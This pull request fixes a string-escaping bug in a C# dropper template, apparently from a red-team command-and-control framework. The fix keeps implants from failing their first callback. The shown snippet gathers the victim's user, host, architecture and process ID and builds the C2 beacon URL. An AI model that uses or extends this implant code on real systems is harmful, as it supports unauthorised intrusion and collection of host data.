### PR TITLE
"key" string needs to be declared as a verbatim string

### DIFF
--- a/resources/payload-templates/dropper.cs
+++ b/resources/payload-templates/dropper.cs
@@ -221,7 +221,7 @@ public class Program
 			foreach (string du in Program.basearray)
 			{
 				var o = String.Format("{0};{1};{2};{3};{4};#REPLACEURLID#", dn, u, cn, arch, pid);
-			 	string key = "#REPLACEKEY#";
+			 	string key = @"#REPLACEKEY#";
 			 	baseURL = du;
 			 	string s = baseURL+"#REPLACESTARTURL#"; 
 				try {


### PR DESCRIPTION
The key generated sometimes contains "/", therefore it should be declared as a verbatim string.
This has caused implants to fail the initial connection depending on the key generated. 